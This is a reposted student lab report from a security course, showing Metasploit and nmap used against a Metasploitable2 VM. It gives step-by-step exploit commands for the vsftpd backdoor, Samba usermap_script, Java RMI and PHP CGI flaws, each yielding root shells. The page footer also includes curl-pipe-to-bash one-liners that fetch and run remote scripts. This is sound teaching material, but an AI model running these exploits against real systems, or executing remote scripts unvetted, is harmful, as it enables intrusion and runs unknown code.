20232419 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/20 0:18:16/文章来源:https://www.cnblogs.com/gczy/p/19239804

1.实验内容

本实践目标是掌握metasploit的用法。要对主机进行前期渗透、Vsftpd源码包后门漏洞(21端口)、SambaMS-RPC Shell命令注入漏洞(端口139)、Java RMI SERVER命令执行漏洞(1099端口)以及PHP CGI参数执行注入漏洞(80端口)处理。

2实验步骤

2.1 前期渗透

输入账号密码相同的msfadmin登录靶机,在靶机中输入ifconfig查看IP地址用于后续扫描,其IP地址为192.168.175.146

Metasploitable2-Linux-2025-11-18-22-55-47

在Kali虚拟机中切换到root用户下(如果不是),进入msfconsole,执行ARP扫描,具体命令如下:

点击查看代码 
search arp_sweep
use 0
set RHOSTS 192.168.175.146
run

image
从图中可见靶机 192.168.175.146 当前网络状态正常,处于在线且可被 ARP 探测到的状态,识别出的设备类型是VMware, Inc.(说明这是一台 VMware 虚拟机)

2.2 端口扫描

使用nmap进行端口扫描:执行命令nmap -sS -sV 192.168.175.146进行SYN扫描并进行版本探测,发现靶机开放大量端口且存在多个漏洞。

image

进入msfconsole,用以下命令同样能扫描到靶机开放的端口。

点击查看代码 
use auxiliary/scanner/portscan/tcp 
set RHOSTS 192.168.175.146
set THREADS 10 
run

image

2.3 漏洞扫描

执行命令nmap -script=vuln 192.168.175.146对靶机进行漏洞扫描,发现多个端口存在高危漏洞.
21端口(FTP):vsFTPd 2.3.4后门漏洞(CVE-2011-2523),已验证可执行id命令获取root权限(uid=0 gid=0),是最易利用的漏洞。
25端口 对应 Postfix smtpd 服务,扫描结果显示其存在多个 SSL/TLS 相关高危漏洞,可能被数据泄露、会话劫持。
image
image
80端口(HTTP):存在SQL注入、跨站请求伪造(CSRF)、Slowloris DoS漏洞,且暴露了phpMyAdmin、Tikiwiki等管理后台,风险极高。太长就不截图全了。
image
1099端口(RMI):RMI注册表默认配置漏洞,支持远程加载恶意类,可直接执行代码。
5432端口(PostgreSQL):存在POODLE漏洞(CVE-2014-3566)、CCS注入漏洞(CVE-2014-0224),可解密数据库通信数据。
image
6667端口(IRC):UnrealIRCd后门,攻击者可直接获取系统权限,无需复杂操作。
8180端口(未知):同样存在Slowloris DoS漏洞,且多个管理页面的JSESSIONID未设置 httponly flag,易遭 Cookie劫持。
image

2.4 Vsftpd源码包后门漏洞(21端口)

打开msfconsole,用以下命令利用该漏洞

点击查看代码 
use exploit/unix/ftp/vsftpd_234_backdoor 
set RHOSTS 192.168.175.146 
run
可见获得靶机shell,可查看当前路径、目录文件,输入whoami确认当前用户为root用户。

image

2.5 Samba MS-RPC Shell命令注入漏洞(139端口)

执行命令nmap -p 139 192.168.175.146,确认139端口开放。
image
利用Metasploit框架的Samba服务usermap_script漏洞,具体命令如下:

点击查看代码 
use exploit/multi/samba/usermap_script 
set RHOST 192.168.175.146
run

漏洞利用成功后获得靶机shell,可查看当前路径、目录文件,确认当前用户为root用户
image

2.6 Java RMI SERVER命令执行漏洞(1099端口)

由前文得知此端口必定开放,利用Metasploit框架利用该漏洞,具体命令如下

点击查看代码 
use exploit/multi/misc/java_rmi_server 
set RHOST 192.168.175.146
run

漏洞利用成功后获得Meterpreter会话,输入shell切换到交互式Shell,可查看靶机完整系统信息、当前路径及目录文件,确认当前用户为root用户.
image

2.7 PHP CGI参数执行注入漏洞(80端口)

由前文得知此端口必定开放,利用Metasploit框架利用该漏洞,具体命令如下

点击查看代码 
use exploit/multi/http/php_cgi_arg_injection 
set RHOST 192.168.175.146
run

漏洞利用成功后获得Meterpreter会话,输入shell切换到交互式Shell,可查看靶机完整系统信息、当前路径及目录文件,确认当前用户为root用户。
image

3问题及解决

无,这次实验很简单,把代码一一代入即可解决。

4心得体会

这次实验metasploit、nmap用的比较多,感觉用的更熟练了,并且比前几次实验简单,且没有出现什么问题,这很令我惊喜。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/970508.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

22年副省daan

22年副省daan

1、根据“给定资料1”,请你谈谈B公司的案例为企业科技创新提供了哪些启示。(10分) 要求:分析全⾯,条理清晰,不超过200字。 2、根据“给定资料2”,请你谈谈G省在推进粮⻝产业发展中遇到了哪些问题,并逐⼀说明这…
阅读更多...
20251119 之所思 - 人生如梦

20251119 之所思 - 人生如梦

20251119 之所思做的好的事情:1. Nov 17th因为加班太晚,洗完澡已经接近一点半,然后整个晚上就失眠了,熬到早上五点半,想到继续熬也痛苦,然后起床开始跑步,第一次在完全天黑的情况开始跑步,然后看到了天慢慢的…
阅读更多...
11.119

11.119

今天上了离散数学,学了新知识
阅读更多...
2025最新云南旅行社TOP5推荐:深耕昆明等云南全域,自驾游 + 本地游 + 个性化定制,解锁深度体验引领个性化旅游新体验

2025最新云南旅行社TOP5推荐:深耕昆明等云南全域,自驾游 + 本地游 + 个性化定制,解锁深度体验引领个性化旅游新体验

随着旅游市场的蓬勃发展,个性化、定制化旅游需求日益增长,选择一家优质的旅行社成为游客出行的关键。本榜单基于服务质量、线路创新、客户满意度、安全保障四大维度,结合《2025中国旅游行业发展报告》及游客真实反馈…
阅读更多...
第30天(中等题 二分查找)

第30天(中等题 二分查找)

打卡第三十天 2道中等题题目:思路:因为正方形中心固定,所以边长越大,包括的点也就越多。问题转换为求正方形的最大边长。若正方形的边长为2r,则所有横坐标的绝对值小于等于 r,且纵坐标的绝对值也小于等于 r 的点…
阅读更多...
2025云南旅行社首选——中青国旅“用心陪着你”,定制游+自驾游杜绝套路,纯净体验

2025云南旅行社首选——中青国旅“用心陪着你”,定制游+自驾游杜绝套路,纯净体验

随着大众旅游消费升级与个性化出行需求的日益增长,选择专业可靠的旅行社成为提升旅行体验的关键。在2025年云南旅游市场中,云南中青国际旅行社(集团)有限公司(简称“中青国旅”)凭借深厚的品牌积淀与全方位的服务…
阅读更多...
Debian 12/13可用的华宇拼音输入法

Debian 12/13可用的华宇拼音输入法

在 铜豌豆Linux 看到了 华宇拼音输入法,Windows下我一直用它,很好用。 在Debian 12下装不上,需要libqt4-declarative,和Qt5啥的冲突。 下载了libqt4-declarative-4.8.7-alt26.x86_64.rpm 1.1MB, apt download com…
阅读更多...
拆解一个真实电商项目:微服务架构中的服务治理与性能优化

拆解一个真实电商项目:微服务架构中的服务治理与性能优化

基于真实电商场景,深入解析微服务架构设计。涵盖Nacos服务治理、Ribbon负载均衡、分布式缓存等核心技术,剖析单体到分布式的演进逻辑。从架构演变到组件选型,从服务拆分到性能调优,讲解分布式系统设计中的常见问题…
阅读更多...
VB6版Dll文件注册器 - 开源研究系列文章 - 个人小作品

VB6版Dll文件注册器 - 开源研究系列文章 - 个人小作品

VB6版Dll文件注册器 - 开源研究系列文章 - 个人小作品Posted on 2025-11-20 00:00 lzhdim 阅读(0) 评论(0) 收藏 举报 这次继续整理和重构VB6的一些小作品。这个小作品是一个Dll文件进行注册的小应用。主要…
阅读更多...
win10里面的中文输入法在左上角的带有绿色箭头

win10里面的中文输入法在左上角的带有绿色箭头

知乎:求教怎么关闭win10里面的中文输入法在左上角的带有绿色箭头的候选框? win11用户, 在编辑文字的时候发现自己输入法的框跑到电脑左上角去了,没有跟随着我们的打字光标,这要怎么办? B站也有人发这个问题 : mo…
阅读更多...
[Flink] Apache Stream Park : 一站式的流处理计算开发运管平台

[Flink] Apache Stream Park : 一站式的流处理计算开发运管平台

1 概述:Apache Stream Park Apache Stream Park在实时处理领域,Apache Spark™ 和 Apache Flink 代表着巨大的进步,尤其是 Flink,它被广泛视为下一代大数据流计算引擎,而我们在使用 Apache Flink 和 Apache Spark…
阅读更多...
linux . profile修改

linux . profile修改

在 Linux 系统中,.profile 文件是用户登录时执行的初始化脚本,通常位于 ~/.profile 或 ~/.bash_profile(取决于使用的 shell,如 bash 或 zsh)。修改 .profile 文件可以自定义用户登录时的行为,比如设置环境变量、…
阅读更多...
linux -xr

linux -xr

您提到的“linux -xr”可能是输入错误或不完整的命令。让我为您解释几个可能的含义:1. linux -xr(可能的错误输入)如果您是想输入 ls -xr,那么: ls -xr-x:递归地处理文件,即对目录中的文件进行排序。 -r:反转排…
阅读更多...
linux echo gt;命令

linux echo gt;命令

在 Linux 中,echo 是一个用于输出字符串的命令,而 > 是一个重定向操作符,用于将命令的输出重定向到指定的文件。 命令解释: echo + #引号 + hello + #引号 + > file.txtecho + #引号 + hello + #引…
阅读更多...
2025沧州防水补漏、防水、漏水维修、堵漏、漏水检测工程单位靠谱推荐:连锁企业,深耕本地市场,沧州极冠防水实力出圈

2025沧州防水补漏、防水、漏水维修、堵漏、漏水检测工程单位靠谱推荐:连锁企业,深耕本地市场,沧州极冠防水实力出圈

随着建筑使用年限增长与极端天气频发,房屋渗漏问题已成为困扰众多业主的顽疾。据中国建筑防水协会2024年行业报告显示,我国建筑渗漏率高达80%以上,二次维修率超过65%,行业亟需专业可靠的解决方案。在2025年沧州防水…
阅读更多...
linux -static

linux -static

你提到的 linux -static 可能是误写或不完整的问题。在 Linux 系统中,-static 是某些编译选项(如 gcc 或 clang)中常用的参数,用于指定静态链接。 一、常见用途:静态链接(-static) 在编译 C/C++ 程序时,-stati…
阅读更多...
腾讯云ubuntu服务器初始化

腾讯云ubuntu服务器初始化

查看apt速度,如果慢的话,手动给它换源sudo apt update更新系统软件包,过程中有需要选择的,直接回车就行sudo apt upgrade -y && sudo apt autoremove -y查看Python版本python3 -V python -V || sudo apt i…
阅读更多...
每日反思(2025年11月19日)

每日反思(2025年11月19日)

今天做了算法题
阅读更多...
Linux脚本工具

Linux脚本工具

检查流媒体解锁情况 bash <(curl -L -s check.unlock.media)IP质量检测 bash <(curl -Ls https://check.place) -I
阅读更多...
11.19 P9532 前缀和

11.19 P9532 前缀和

点击查看代码 #include<bits/stdc++.h>using namespace std;int t,n,x;int main() {ios::sync_with_stdio(false);cin.tie(nullptr);cout.tie(nullptr);cin>>t;while(t--){long long ans=0;cin>>n&g…
阅读更多...
最新文章

Copyright @ 2022~2023